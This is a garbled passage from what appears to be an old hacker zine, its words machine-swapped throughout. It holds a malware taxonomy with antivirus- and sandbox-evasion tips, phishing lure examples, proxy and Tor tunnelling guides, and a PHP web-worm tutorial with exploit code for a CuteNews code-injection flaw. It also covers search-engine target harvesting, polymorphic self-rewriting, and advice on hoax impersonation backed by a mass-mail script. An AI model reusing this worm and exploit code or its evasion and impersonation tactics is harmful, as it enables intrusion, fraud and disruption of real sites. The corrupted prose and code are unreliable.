troopers). Properly, at this time's trojan horses are very like that, they pose like an
harmless or (extra usually) a really engaging file, however they really include a
harmful payload, both they're disguised worms, virii, adware, logic bombs,
or RAT's (Distant Administration Instruments).

IV) Adware.

These are the brand new gamers in at this time's cyber-battlefields. Adware is a time period for
any piece of software program that displays the sufferer's habits, from browsing habits to
chat passwords, to banking passwords to full scale company espionage.

V) Logic Bombs.

Fairly uncommon, Logic Bombs are applications that triger when a sure occasion occurs
(or does not occur). When you find yourself the sufferer of a logic bomb,  that
somebody is de facto after you, as a result of they do not unfold within the wild. Logic bombs
are generally created by disgruntled programmers who did not obtain their
fee, or are afraid they will not obtain it. A logic bomb triggers when sure
circumstances are met, like a date, or the deletion of a sure file. Think about a
programmer works someplace, and he installs a LB that requires him to enter a
password each month, else it can erase the whole field' harddrive. When the
programmer will get fired, he cannot enter the password, and the corporate loses all
the information on the programmer's field.

0->2) Kinds of malware.

I) Virii.

a) Overwriters, these are fairly frequent within the viral world. They only exchange the
hostprogram with themselves, erasing this system.

b) Companions, these virii do not alter the hostfile, they disguise them from the
person and rename them, taking their place and executing the host after they're

c) Bootsector virii, these virii infect a HD or floppy bootsector, initiating
themselves at every startup, with out person interplay, making them fairly

d) Prependers, these virii place their code in entrance of the sufferer code,
executing themselves earlier than the sufferer code can, thus not notifying the sufferer
of lacking information.

e) Appenders, the identical as prependers, solely they execute after the sufferer code.

f) Reminiscence-resident, these kind of virii use TSR methods (Terminate and Keep
Resident), to stay within the field' reminiscence (often by interupt hooking) till
one thing occurs (a .exe file is opened) after which they infect information this manner.

g) Encrypted virii, to idiot scanners within the outdated days, virii used to encrypt
their opcode our bodies, and decrypted themselves throughout runtime. This system has
advanced a great distance (see beneath).

h) Oligomorphic virii, these virii are encrypted virii, who change their
decryption/encryption key at each replication, thus making it tougher for a
virus scanner to detect them.

i) Polymorphic virii, a fairly superior method, these little devils substitute
entire opcode blocks with blocks that look totally different, however do the identical.

j) Metamorphic virii, one of many latest methods to idiot AV's, these virii
exchange complete blocks of logic of their our bodies. They exchange 3 with (1+2) or (6
/ 2) or (((2 * 2) +2) / 2) for instance.

ok) EPO virii, entry level obscuring (or obfuscating) virii place their code physique
someplace random contained in the host's physique, and modify the host to leap to the
level the place the virus begins, thus forcing AV's to scan complete information, slowing
them down.

l) Cross-infection virii, these virii infect a number of file sorts, thus
rising their effectiveness.

m) Cryptovirii, these are comparatively uncommon, encoding complete harddrives with  a
publickey algorithm, and forcing the sufferer to pay the viruswriter ransommoney
to decode his/her HD (additionally referred to as Ransomware).

II) Worms.

a) Massmailing, these worms harvest e-mail adresses from a field (both from WAB
information, messenger contact lists or different addressbook information) and mail themselves
to them to propagate, they are going to journey around the globe actually fast, however will
entice virusanalyst's consideration actually quickely too, making them considerably blasŽ
(and unsubtle) in my view.

b) P2P, these worms unfold trough peer-to-peer software program, propagating as well-liked
filenames (music, films, footage, applications, and many others), these might go practically as
quick as Massmailers (so long as they ensure that they preserve propagating as information
which are nonetheless well-liked) and much more silent.

c) I-Worms, Web worms are a particular case, the very first worm, the
morris-worm, was additionally an internetworm, nevertheless it took greater than 15 years earlier than the
second I-Worm appeared. I-Worms are sometimes called Warhol-worms, derived
from Warhol's prediction that sooner or later everyone might be well-known for 15
minutes. I-Worms journey by exploiting safety gaps, like Morris' sendmail bug.
Code-Crimson,Nimda, Sasser and Zotob are all Warhol worms (I-worms) and are
extraordinarily successfull.

d) Botnet worms, these worms operate a bit as a trojan too. They use the
sufferer's field as a zombie, permitting the attacker to remotely use the sufferer's laptop
to ship spam, log passwords and launch ddos assaults.

e) Neural-Community worms, I've by no means heard of 1 seen within the wild, simply as a
poc (proof of idea). Also known as Curious Yellow worms, these worms
talk with one another with a view to change info over potential
victims, new exploits to make use of to propagate and new anti-antivirus methods.
These worms might harbor a self-improving/self-rewriting mechanism, making them
nearly invincible. However it will take a gaggle of very skilled A.I.
Scientists to code such a worm.

III) Trojans.

a) R.A.T's

The preferred of trojans, these applications enable an attacker to remotely
management the contaminated field, gathering delicate data, or utilizing it to launch ddos
assaults, use it as a tunnel to root different bins or to anonymously launch new
viral epedemics.

b) Rootkits

I do not know if these may be thought-about trojans, however they're (in my view)
finest categorised right here. Rootkits enable a distant attacker stealthy entry to a field,
hiding processes, directories, information and further accounts.

b) different

Any program, disguising itself as one thing else, may very well be thought-about a trojan.

IV) Adware

a) Homepage/Searchpage Hijackers

These applications change your homepage and searchpage to a web page of the writer's

b) Dialers

Dialers abuse the sufferer's dialup connection to dial to a really costly quantity
someplace overseas, producing cash for the writer.

c) Behavior-trackers

These applications observe your surfing-habits, promoting belongings you ( in keeping with
your browsing) need.

d) Keyloggers

May be categorised underneath trojans. Keyloggers monitor your keystrokes,
stealing your passwords and sending them to a distant attacker for his objectives.

V) Logic Bombs

see rationalization in 0->1.

1) Summary ideas

Now we all know some primary malware ideas, we are able to delve additional in principle about
malware growth.

1->1) Survival Idea

First we have to know what's vital for malware to outlive. Properly, listed here are
some vital issues:

I) Spreading

A very powerful characteristic of most malware is to unfold so far as potential,
infecting a variety of information/bins.

II) Effectivity

Doing what it's designed for is in fact extraordinarily vital. For some worms
it will be taking down a web site, or for adware it will be monitoring surfer

III) Stealth

Not being detected by AV's is essential in surviving. If malware is detected it
quickly turns into unusable and dies.

1->2) Survival Concept

I) Spreading

Spreading may be finished in some ways. As described in 0->2, malware can tackle
many propagation types. Crucial when spreading is part of
social-engeneering. Sending a mass-mail like:

----------start of mail---------------------

Topic: dfjadsad

Physique: Hello, open the attachment

Attachment: blah.exe

--------end of mail---------------------

would not attact many individuals. It's boring. A mail like this nonetheless:

----------start of mail---------------------

Topic: Your Credit score Card has been charged

Expensive [email protected],

Your buy of the $1000 bodyset-deluxe was sucessfull, your credit-card has
been charged accordingly, examine
the attachment for particulars.

Yours sincerly,

The E-Bay staff.

Attachment: Particulars.doc.exe

--------end of mail---------------------

would entice extra folks, they might be wanting to see what has occurred to them,
no person needs to be
charged for one thing they have not purchased.

This goes for the P2P manner too, information like StarWars - Revengeofthesith.avi.exe
unfold sooner than blah.exe.
Additionally, most individuals really feel safer if a file is zipped. Properly, together with a
zip-component in your malware, to zip it everytime it replicates is not that

II) Effectivity

There at all times must be a fragile stability between spreading,stealth and
effectivity. Spreading like mad will get your malware very far, however it is going to be
detected in a matter of hours, making it out of date, whereas excessive stealth would possibly
preserve your malware undetected for years, nevertheless it will not infect greater than 10 bins.
Being environment friendly completely will depend on your objectives.

III) Stealth

Malware has many enemies, listed here are a few of them:

a) AV's
b) Firewalls
c) AV researchers

fooling AV's is not too dificult, generally switching two or three bytes is
sufficient to idiot them, however your virus will get detected once more and all might be for
So it's worthwhile to defend your malware from AV's. Thus
encryption,Oligomorphism,Polymorphism and Metamorphism are born. For all
cryptographers on the market, let go of the basic thought of encryption, Viral
encryption is one thing totally different. Encryption,Polymorphism,Oligomorphism and
Metamorphism for executables is simply potential in meeting, so begin studying it!

Fooling firewalls will also be finished fairly simply, simply terminate their processes!
Though that is fairly impolite and unsubtle, it's efficient. A extra refined manner is
including your program to their trustedprogram-list.

Fooling an AV researcher may be fairly tough. They are going to disassemble your
virus, Emulate it is code and Sandbox it. Making your virus extraordinarily complicated,
with lengthy loops and jumps will preserve them from totally understanding it by
disassembly. Stopping Emulation is sort of tough, you would need to examine if
your code is being emulated by making a change, and checking if that change
actually has been utilized, if not, you're being emulated. Sandboxing is a
tehcnique that includes placing your virus in a digital machine with some
baitfiles to see what it does. This may very well be overcome by checking for VMware,
Digital Laptop, and many others. I'll give particulars later.

2) Code Apply.

Earlier than beginning this part I assume the reader is conversant in commonplace
programming principle,viral principle and several other (script)languages, resembling
c++,Pascal,Vbs,Js, batch and a few assembler would assist too. All assembler supply
examples might be in 16-bit assembler, since these are primarily for instructional
functions, their outdated nature will practically robotically SK-Proof it, nonetheless,
anybody conversant in 16/32- bit assembler can convert the examples to swimsuit the
win32 platform.
This part will include viral code. I'm not answerable for any harm finished
by any of those applications, nor do I promote releasing them. I've divided the
Code Apply in a number of sections as follows:

I) Easy Exe Virii
II) Batch Virii
III)Script Virii
IV) Reasonable ExeVirii/Worms
V) Idea Virii

( Pattern code may be discovered on-line at http://www.hackthissite.org/zine/ )

[ ---------------------------------------------------------------------------- ]
[ proxy chaining, tunnelling and tor................. by outthere and kuroishi ]
[ ---------------------------------------------------------------------------- ]

The creation of nameless networks like Tor based mostly on assymetric key
cryptography and onion routers do make conventional proxy companies appear quite
quaint, however conventional nameless proxy companies are nonetheless fairly helpful
for IRC, leap bins, and basic web tomfoolery, regardless of the threats from

A proxy is a chunk of software program that makes requests on behalf of a consumer to
distant assets. This text goes into quick, sensible summaries of a number of
prevelent proxy protocols obtainable accross the web. Authorization and
identification procedures are principally ignored, since open proxies are so frequent
and to maintain the article quick and sensible.

=== CGI Proxies ===
CGI proxies merely fetch net pages and sometimes FTP or different information based mostly on
user-supplied enter, which is often only a GET variable. For instance,
The reliability and switch charges of those companies are sometimes fairly excessive, and
may be simply strung collectively instantly from the URL in lots of instances, like so:
Many language translators additionally operate on this capability, however sadly they
usually ship an X-Forwarded-For header figuring out the sender's IP deal with.

=== HTTP Proxies ===
HTTP Proxies are fairly easy. The consumer sends a daily HTTP request to the
proxy server with an absolute URI. Due to this fact, what would usually be:
  GET / HTTP/1.1
  Host: www.hackthissite.org

when connecting on to the hackthissite.org server turns into:
  GET http://www.hackthissite.org/
  Host: www.hackthissite.org

when connecting via a proxy. A clean line after the final header establishes
the tip of the request (until a Content material-Size has been specified, as is
typical for a POST). The request then goes proper on via as if the
vacation spot had been instantly related to. Straightforward.

Sadly, some http proxies are configured to ship sure personally
figuring out info to the distant methods.
  * Clear proxies ship the consumer IP deal with within the X-Forwarded-For
    header and different headers affirming the usage of a proxy server.
  * Nameless proxies ship out headers stating that the server is a proxy, however
    do not ship out the consumer's IP deal with.
  * Excessive anomnity, or "elite" proxies do not ship out any info that
    identifies the service as a proxy to the vacation spot.

Join proxies have been created as an extension to HTTP proxies as a method for
establishing persistent connections for protocols resembling IRC. They're
comparatively easy as properly. For example:
  CONNECT irc.hackthissite.org:6667 HTTP/1.1

will set up a connection to the HTS IRC server on port 6667. The server will
reply with an HTTP-formatted standing message, and if the request was profitable,
information may be despatched and acquired freely. As a result of join is an extention to the
HTTP protocol, including additional traces like a Host or a Person-Agent will work simply
tremendous, however for many functions is pointless.

=== SOCKS4 ===
Socks4a is an extension to the unique socks4 to supply DNS lookup on the
proxy facet. First, the consumer sends a request like so:
  * x04 - socks4 model identifier
  * x01 - command; 1 is join
  * x00x50 - port expressed as 16 bit huge endian: x00x50 could be port 80
      In Perl, pack("n", $port) will convert the integer $port to 16 bit huge
  * xc0xa8x06x47 - 4 bytes specifying the vacation spot IPv4 deal with: the 4
      bytes proven would equate to Use x00x00x00x01 if the
      proxy is to do the DNS lookup itself. (Any non-zero for the final octet
      will do.)
  * rawrx00 - null-terminated USERID string, these are sometimes in comparison with
      IP addresses or IDENT replies as a primative type of authentication, however
      not often. More often than not this string is ignored, so put one thing random.
  * hackthissite.orgx00 - null-terminated area identify, only a null byte if a
      legitimate IP was offered earlier
The socks4 server then sends a reply like so:
  * x00 - model of the reply code, ought to at all times be 0
  * x5A - request granted
    OR x5B - rejected or failed
    OR x5C - rejected as a result of cannot connect with identd on the consumer
    OR x5D - rejected as a result of identd and the consumer report totally different IDs
  * x00x50 - vacation spot port, ignore
  * xc0xa8x06x47 - vacation spot IP, ignore
After these steps write on to the socket as if the consumer was instantly

=== SOCKS5 ===
Socks5 was developed to supply each UDP and TCP, robust authentication, DNS,
and IPv6 from the bottom up. First off, the consumer sends a model
identifier/technique choice message:
  * x05 - socks5 model identifier
  * x01 - variety of strategies to strive; for our functions, one will suffice
  * x00 - strategies; x00 is not any authentication required
The server will then reply:
  * x05 - socks5 model identifier
  * x00 - chosen technique; if that is xff then the consumer should disconnect
If every thing went properly, the consumer then sends a socks5 request:
  * x05 - socks5 model identifier
  * x01 - command (x01 for join)
  * x00 - reserved, go away null for now
  * x01 - deal with kind, x01 for IPv4
    OR x03 - for a site identify
    OR x04 - for IPv6
  * xc0xa8x06x47 - 4 octets specifying the deal with for IPv4
    OR 16 octets for an IPv6 deal with
    OR 1 byte specifying the string size then the area identify for DNS
  * x00x50 - vacation spot port, x00x50 is port 80
The server replies with:
  * x05 - socks5 model
  * x00 - reply subject, x00 for profitable
    OR x01 for basic socks server failure
    OR x02 for connection not allowed
    OR x03 for community unreachable
    OR x04 for host unreachable
    OR x05 for connection refused
    OR x06 for time to dwell expired
    OR x07 for command not supported
    OR x08 for deal with kind not supported
    OR x09 to xff for unassigned
  * x00 - reserved, at all times x00
  * x01 - deal with kind, similar values as in request
  * xc0xa8x06x47 - certain deal with
  * x00x50 - certain port, does not actually matter for a join request
Then the transaction continues as if the consumer have been instantly related.

=== Chains, Closing Notes ===
For added anomnity, a number of proxies may be strung collectively in a course of identified
as chaining. In proxy chains, the consumer instructs proxy servers to connect with
subsequent proxy servers till the vacation spot. This system can significantly
enhance anomnity, however might lower throughput and improve latency.

Apparently, Tor is nothing greater than a socks4a proxy service so far as the
consumer is worried, which brings in the potential for utilizing Tor conceptually
as simply one other hyperlink in a series. Extending Tor exit nodes with open proxies
additionally opens up the potential for getting round Tor restrictions on some
networks whereas sustaining encryption and anomnity, as it's a lot simpler to
block Tor than to dam the large variety of open proxies on the web,
particularly these on non-standard ports.

Reader, beware. Many proxies are run by phishers, over-zealous community
directors, or regulation enforcement companies that log every thing. All the time use extra
than one layer of anomnity and by no means ship unencrypted personally identifyable
info via public proxy servers.


[ tunnelling and tor ................................................ kuroishi ]

Tor is the Onion Routing Protocol, a undertaking being developed by the Digital
Freedom Frontier (EFF) for anonymity and privateness safety on the web.  It
breaks up your packets and spreads them over the whole Tor community, encrypted,
to finish factors around the globe, the place they're reassembled and despatched to their
meant vacation spot.  Tor can be utilized to guard your id when searching
the net, chatting, or when doing tremendous enjoyable no-no stuffs ;D.

First, set up Tor.  Tor is obtainable from the EFF, at tor.eff.org.  Set it up
in your OS of alternative.  You may additionally most likely need Privoxy, directions on
configuring your HTTP Proxy (privoxy) to make use of a SOCKS proxy (tor), see the Tor
web site.

To make use of Tor to anonymize your net searching, open your browsers proxy settings.
If you happen to're utilizing each Tor and Privoxy you will wish to level your http proxy to
localhost, port 8118. If you happen to're utilizing Firefox, you will wish to examine the field that
says "Use the identical proxy for all protocols."  If you happen to're not utilizing Privoxy (simply
Tor), set your SOCKS v4 proxy to localhost, port 9050.  Verify if it is working by
going to http://whatismyip.com.  (a observe for Firefox customers: there's a useful
Firefox extension referred to as ProxyButton.  It permits you to toggle your proxy on and
off rapidly out of your toolbar.  I like to recommend this extension in case your doing severe
webhacking ;D)

You possibly can arrange different purposes to route site visitors via tor. Direct SOCKS
proxies via localhost port 9050.  However generally you might wish to use Tor for
an utility that doesn't have SOCKS help, that is the place socat is available in
useful.  Socat is a great tool for coping with socket connections and tunnels.
I've written a fast script, referred to as torbind to deal with socat for us.

# Utilization: ./torbind [local port] [remote host] [remote port]
socat TCP4-LISTEN:$1,fork SOCKS4A:localhost:$2:$3,socksport=9050

Say we wish to telnet to a distant host over tor.  Utilizing socat we might do that:

$ ./torbind 1337 h4x3db0x0r.com 12345&; telnet localhost 1337
Linked to h4x3db0x0r.com port 12345.

or IRC:

$ ./torbind 7000 irc.hackthissite.org 7000&; irssi
/server -ssl localhost 7000

You possibly can route any port on native host to any port on any vacation spot via tor.
You possibly can determine the best way to use this by yourself ;D.

Say your hacking on the street.  It's worthwhile to use a library or college pc
to do some severe buisness.  You possibly can't set up Tor as a result of sure restrictions,
or simply as a result of time.  A pleasant fast n' soiled manner of getting nameless safety
is to make use of an SSH tunnel.  Any SSH consumer can route site visitors via a SOCKS
tunnel to your ssh server.  When you've got Tor and Privoxy working in your server
you may route your site visitors out via that.  In Linux or MacOS simply do for

[email protected] $ ssh -L12345:localhost:8118 [email protected]
[email protected] $

Again at localhost now you can set your http proxies to localhost:12345.  This
will bounce site visitors via your ssh session to your server, and out via Tor
for full fast anonymity.

In home windows, you may arrange an SSH tunnel utilizing PuTTY.

In PuTTY Config, underneath SSH, go to Tunnels and Add a brand new forwarded port, set
supply port, like above one thing arbitrary, say 12345.  Vacation spot must be
localhost:8118 (for Privoxy, with out privoxy, use port 9050, for SOCKS.)  Now
connect with your SSH server, authenticate, and you need to have the ability to set your
HTTP or SOCKS proxy to localhost, port 12345.

You additionally configure the unix command line ssh consumer to bounce via tor.
Set up join.c at /usr/native/bin/join and add the next to your
ssh_config file. Alternatively, you may write shell scripts to automate the
strategy of alternating between tor ssh and non tor ssh.

Host *
ProxyCommand /usr/native/bin/join -4 -S %h %p
(must have /usr/native/bin/join )

cp /sw/and many others/ssh/ssh_config.tor /sw/and many others/ssh/ssh_config

cp /sw/and many others/ssh/ssh_config.nontor /sw/and many others/ssh/ssh_config

                                !!!  ACTION  !!!

[ the art of writing a web worm in php ....................................... ]

* Introduction
* Automation
* Goal Gathering
* Evading IDS, Polymorphism, and Communication
* Closing Phrases

**** Introduction *****
This text makes use of some particular examples from an unreleased net worm that will
unfold itself via susceptible php scripts. The worm is known as World Cant Wait
and would publish an announcement of the November 2nd Drive Out the Bush Regime
protests on hundreds of message boards and weblog engines. The unique made use
of a personal vulnerability however the methods described right here use the lately
disclosed php code execution vulnerability in CuteNews 1.4. We have been taking part in
round with automating this exploit to search out targets and replicate itself as a
programming train whereas we have been toying with the thought of covertly releasing it
within the buildup to the protests to get folks to the streets and provides tooth to
the motion. Ultimately we determined that as an alternative of risking authorized issues
and trashing a bunch of methods, we'd strengthen our motion by explaining
the methods and launch the code in modules to assist arm future php worm

Though we left some intentional bugs and took parts of the code out, the
snippets beneath can be utilized to construct a damaging worm. Acknowledge the
implications of getting concerned with such actions and do not make ourselves into
the violent and damaging hackers the media tries to color us as. The wonder
and genius of a worm is in writing the code itself, not what number of methods it could
mess with. So let's get to it, and keep in mind - coding will not be against the law.

**** Automation ****
Discover a vulnerability and write a self-automated goal gathering and
exploitation engine. Internet based mostly vulnerabilities are predictable, can collect
targets via engines like google pretty simply, and may be exploited robotically
by forging a sequence of HTTP requests.

whereas ($cease == false) 
  $listing = gather_targets();
  for ($i=0;$i<depend($listing);$i++) 
    echo " [x] targetting $listing[$i]...n";
    if (!is_infected($listing[$i])) infect($listing[$i]);
  $cease = true;

With the intention to have an online based mostly worm unfold, it's worthwhile to automate the exploitation
course of. This may be finished by utilizing PHP's socket capabilities to determine
connections to the net server and sending http information. This operate demonstrates
how a PHP script can connect with a server, ship information, and return the response:

operate make_request($area, $packet) 
  $fp = @fsockopen($area, 80, $errno, $errstr, 10);
  if (!$fp) return false;
  fwrite($fp, $packet);
  whereas (!feof($fp)) $textual content.= fgets($fp);

Then it's only a matter of forging a correct HTTP request which is able to exploit the
vulnerability and get it to run a duplicate of itself on the contaminated system.
CuteNews writes info to information/flood.db.php when somebody posts feedback to
a information article. You possibly can insert PHP code to this file by passing information within the
Shopper-Ip HTTP header.

$packet = str_replace("n","nr",
&ucat=& HTTP/1.1
Settle for: */*rnAccept-Language: en
Settle for-Encoding: gzip, deflate
Shopper-Ip: <?php echo "arbitrary php code to be executed!!"; ?>
Person-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6
(KHTML, like Gecko) Safari/412.2
Content material-Kind: utility/x-www-form-urlencoded
Content material-Size: 107
Connection: shut
Host: $area



If we make a few these requests, it can write the PHP code from Shopper-IP
to flood.db.php. Then we are able to name flood.php from a regular GET request to
execute the code. Now that we are able to automate the method of executing PHP code on
a given server, we are able to begin desirous about some code that may replicate the
worm in addition to delivering our payload. This instance will copy the whole worm
code to 'sekret.php' on the susceptible server, able to be run. You possibly can add any
payload on the finish of Shopper-Ip, from working sekret.php to including a line on the
high of stories.txt which is able to make a information publish on each susceptible CuteNews website ;)

$supply = str_replace("$", "$",str_replace(""", """,str_replace("",
Shopper-Ip: <?php $fp=fopen("sekret.php", "w");fwrite($fp,
"$supply");fclose($fp); ?>rn ...
for ($i=0;$i<2;$i++)  $bob = make_request($area, $packet); 
make_request($area, "GET $location/information/flood.db.php HTTP/1.1rnHost:
$domainrnConnection: closernrn");

Different An infection Methodology: PHP Inclusion
It's not tough to automate the method of PHP embrace associated
vulnerabilities both. Poorly written PHP scripts generally have bits of code
much like <?php embrace $web page; ?>, which is susceptible in lots of conditions to
distant PHP code execution by passing the URL to a little bit of PHP code because the GET
variable 'web page'. Our worm can copy itself to some place on the net root and cross
the URL to an HTTP GET request to execute itself on one other server.

$fp = fopen("sekret.txt", "w");
fwrite($fp, file_get_contents($_SERVER['PHP_SELF']));
$url = $_SERVER['SCRIPT_URI'];
make_request($area, "GET /check.php?path=$url HTTP/1.1rnHost:
$domainrnConnection: closernrn");

Different An infection Methodology: SQL
Different An infection Methodology: JavaScript / XSS

**** 3. Goal Gathering ****

Through the growth of the worm, it will be smart to seperate the precise
exploit code from the goal gathering code. Check by yourself machine or on a
LAN utilizing code much like:

operate gather_targets() 
  return array("http://localhost/cutenews");

For the needs of net based mostly worms, it is sensible to make use of engines like google in
order to extract potential targets. You possibly can simply write just a few queries that may
produce URLs to websites working particular software program. This may be automated via
web page scraping code to generate an array of targets which may be handed to your
worm for an infection.

  $search = array("inurl:flood.db.php", ""powered by cutenews v1.3"",
""/cutenews/remote_headlines.php"", ""powered by CuteNews" "2003..2005
CutePHP"",  "inurl:"/newsarchive.php?archive"");
  $question = $search[rand(0, count($search)-1)];

You possibly can scrape outcomes from main engines like google by making HTTP requests and
wanting on the returned URLs.

  $fp = fsockopen("google.com", "80");
  fwrite($fp, "GET /search?q=" . urlencode($question) .
=org.mozilla:en-US:official HTTP/1.1rn
Host: www.google.comrn
Person-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)
Settle for:
textual content/xml,utility/xml,utility/xhtml+xml,textual content/html;q=0.9,textual content/plain;q=0.8,
Settle for-Language: en-us,en;q=0.5rn
Settle for-Encoding: gzip,deflatern
Settle for-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn
Connection: closernrn");
  whereas (!feof($fp) AND (strpos($textual content, "2005 Google") === false)) 
    $textual content.= fgets($fp);

  whereas (!(strpos($textual content, "<a href="http://") === false)) 
    $starttext = substr($textual content, strpos($textual content, "<a href="http://") + 9);
    $thenumber = substr($starttext, 0, strpos($starttext, """));
    $textual content = str_replace("<a href="$thenumber">", "x", $textual content);
    if (strpos($thenumber, "google") === false) $vuln[] = $thenumber;

**** Evading IDS, Polymorphism, and Communication ****
You possibly can modify the supply of this system on the fly by making a number of discover and
replaces within the code for every new iteration of the worm. PHP and different languages
have a number of operate aliases that may be swapped to provide the identical outcomes.
Take into account including extroneous PHP code as trash to confuse file sizes and coding
similarities. Along with altering the names of variables in this system, you
can even categorical values of numbers and strings in several methods.

$random++;              ->        $random+= -2 + 3;
$begin = "go";          ->        $begin = chr(103) . chr(111);
$num = depend($end result);  ->        $num = sizeof($end result);

The next little bit of code revealed in 29a rewrites the supply utilizing new
variable names.

$changevars=array('changevars', 'content material', 'newvars', 'counti','countj',
$content material=fread(fopen(__FILE__,'r'),filesize(__FILE__));
  $content material=str_replace($changevars[++$counti], trash('',0), $content material);

fwrite(fopen(__FILE__,'w'),$content material);

operate trash($newvar, $countj) 
  do  $newvar.=chr(rand(97,122));  whereas (++$countj<rand(5,15));
  return $newvar;


Randomizing information despatched within the http request, making it much less predictable. You possibly can
embrace and select a random user-agent making it appear like actual customers. Otherwise you
can modify the precise POST information in order that they are not all utilizing the identical values
for every kind identify (just like the above cutenews instance).

In case your worm will depend on a search engine like google to assemble targets, it'd
be price contemplating diversifying your queries as to cut back the probabilities of being
blacklisted and killing the worm. inurl would possibly discover a variety of pages, however intitle
works as properly. Take into account randomizing the user-agent of your http requests or
integrating a number of search engine help to maintain them confused and lengthen the
length of the worm.

Develop strategies of speaking with previous and future iterations of the worm,
feeding it places of attacked bins. A decentralized technique of interworm
communication can even assist the worm adapt itself by discovering(fuzzing) new
exploits or being fed new assault vectors.

**** Closing Phrases ****
World Cant Wait was developed as a easy proof-of-concept on the planet of
writing net based mostly worms that unfold via susceptible php scripts. Though the
worm code was not designed to trash methods (the above code will not even work
with out some modification) the ideas can be utilized to ship all types of
payloads. Script kiddie worms have previously been used to assemble jumpboxes,
harvest passwords, or ddos main methods, whereas others have really went and
patched the safety gap of the susceptible software program. Others are toying with the
thought of creating mass quantities of posts on guestbooks, blogs, and message boards to
google bomb and manipulate google and different spidering methods. The probabilities
are countless, and the actual genius is in creativity.

Most individuals desirous about superior coding workout routines resembling writing worms are
motivated by the problem of truly growing environment friendly code to automate the
artwork of gathering targets and exploiting them. There isn't a larger and extra
stunning coding train for effectivity and complexity than coding a worm. Even
if writing code may be thought-about a prison act within the eyes of the state,
curiosity on this stunning artwork has been round for many years and can at all times
stay part of hacker tradition so long as we're in a position to develop them in a
safe and accountable manner.

[ creating national media stunts ............................................. ]

coordinate with different nationwide actions, occasions, protests. discover one thing that
will already be on folks's thoughts and add gas to the flames.

trigger digital disruption: announce a phony mayor resignation, pose as your
boss asserting raises for everyone, give folks reductions for cellphone gasoline
web or public transit companies.

make mass bulletins to mainstream and impartial media to publicize your
actions. write a properly formatted press announcement lookup and call reporters
or different members of the press. mass communication(collect media lists and ship
mass emails, publish to indymedia, add information to p2p networks, file drops, or
different well-liked archive websites.

cowl your tracks, by no means use the identical identify twice, do not compromise with white
hats or sellouts, embrace a variety of techniques, have enjoyable and do not get caught!

Mass Mail Script: drop on a field and create a newline-seperated textual content file filled with
emails to main newspapers, televiion and radio stations, congress, and many others.

$fromemail = "Identify Right here <[email protected]>";
$topic = "insert topic right here!";
$message = "insertnmessagenhere!";
$deal with = fopen("emails.txt", "r");
whereas (!feof($deal with)) 
  $buffer = fgets($deal with, 4096);
  if ($buffer != "" AND $buffer != "n") 
    echo "Ship to $buffer...n";
    $a = mail ($buffer, $topic, $message, "From: $fromemail");
    if ($a == false) echo "<font colour="pink">Unhealthy!</font> n";
    echo "Completed.<br>";

fclose($deal with); ?><br><br>finished altogether!

"France's Youth Battles Additionally Waged on the Internet"
Washington Put up, November 10, 2005

Whereas riot police are trying to curb the gangs which have been setting fireplace
to vehicles and buildings in France's poor suburban communities for the previous two
weeks, French officers have solely simply begun the battle to manage a extra
amorphous battleground: our on-line world.

Web blogs have develop into so vicious and intense that police have opened
investigations in opposition to two youngsters for inciting violence on radio
station-sponsored blogs. Hackers took over the Website of the northern Paris
suburb of Clichy-sous-Bois, the place the primary violence started Oct. 27, and
dispatched hundreds of faux e-mails asserting the mayor's resignation. Native
gangs have used textual content messaging on their cell telephones as early warning methods to
alert members concerning the actions of riot police throughout operations of their
communities, gang members mentioned in interviews.

"CTA asks feds to probe e-mail hoax"
Chicago Tribune, December 14th 2004

The Chicago Transit Authority at this time requested the FBI to analyze an e-mail despatched
to media shops early this morning, falsely asserting free CTA rides to the
public on Wednesday.

The so-called press launch went out underneath CTA President Frank Kruesi's identify and
was acquired by the Tribune and different information media at 3 a.m. It apologizes for
pending service cuts, and "within the spirit of the vacations" declares "One Day of
Free Journey" on buses and trains starting 5 a.m. Wednesday.

Nothing may very well be farther from the reality, officers of the transit company mentioned
at this time. "It is phony, and we've referred it to the FBI," mentioned CTA spokeswoman
Noelle Gaffney. The e-mail, headlined "Riders Do not Pay, Employees Do not Acquire!"
didn't originate with the CTA, and there might be no fare vacation, officers

[ black and white chicago 2600 ............................................... ]

After an invite to check the safety of a number of of their methods we
proceeded to root every of them and confirmed them the way it was finished as a result of on the
time they have been curious and  as to how their methods have been compromised.
After Jeremy's place was raided by the FBI, the white hats acquired scared and confirmed
their true colours, beginning to name us 'cyber-criminals' and 'digital
vandals' and began to work with the FBI and ProtestWarrior to demonize,
harass, and incriminate members of our group. By aiding the forces that work to
destroy the hacking motion, Chicago "2600" has misplaced all credibility as a
public hacking group.

Over a interval of months, a number of self-appointed Chicago 2600 directors have
acted in methods which endanger different hackers, abuse their energy, and in any other case
undermine the spirit of hacking basically.

* Turned over logs and different info to narc to folks's bosses with the
profitable intent to get folks fired.
* Has labored with regulation enforcement to supply testimony and freelance
surveillance to assist the FBI's probabilities of conviction in addition to work with
right-wing group ProtestWarrior to do counter-intelligence and public smear
* Repeatedly censor and forestall folks from posting to the general public e mail listing
once they do not agree with the posts or wish to disguise among the stuff they're
* Run a secret e mail listing for many who "make the actual selections concerning the
group", which they've used to badmouth and conspire in opposition to different members
* Moved conferences to a personal location the place they've banned a number of folks
with threats of going to the police

When approached about these violations, the directors preserve that "this
will not be a democracy" and that they'll run their "non-public firm" any manner they
select. Along with breaking various 2600 conventions, this kind of
egotistical, authoritative philosophy undermines the open democratic spirit of

Like many different hacking teams, 2600 has counter-culture roots and has at all times
embraced dissenting opinions. 2600 has additionally acknowledged that hacking is
inherantly political, and the way free know-how can be utilized to defend digital
rights and free speech. The Fifth HOPE was held in NYC a month earlier than the
Republican Nationwide Conference got here to city and had various political
displays overlaying impartial media, the free software program motion, and even a
speech speaking about civil disobedience on the upcoming RNC protests.

2600 has created a set of nationwide tips with a view to preserve native teams
organized across the rules of freedom and democracy and to forestall
power-hungry directors to abuse the remainder of the group.

"Keep in mind that conferences are open to all as per the assembly tips. Your
assembly CANNOT be "sponsored" by anybody or it isn't a 2600 assembly. Additionally, keep away from
showing to be a decent knit group as this can solely discourage or intimidate
new attendees. It additionally could be inaccurate - conferences are not any extra yours than
they're anyone else's. Equally, your website ought to solely give attention to the assembly
itself, not actions exterior of or after the assembly. If you happen to suggest that each one of
the cool folks wind up doing one factor whereas the non-cool folks do one thing
else, you are creating divisions and factions that don't have any place right here. For the
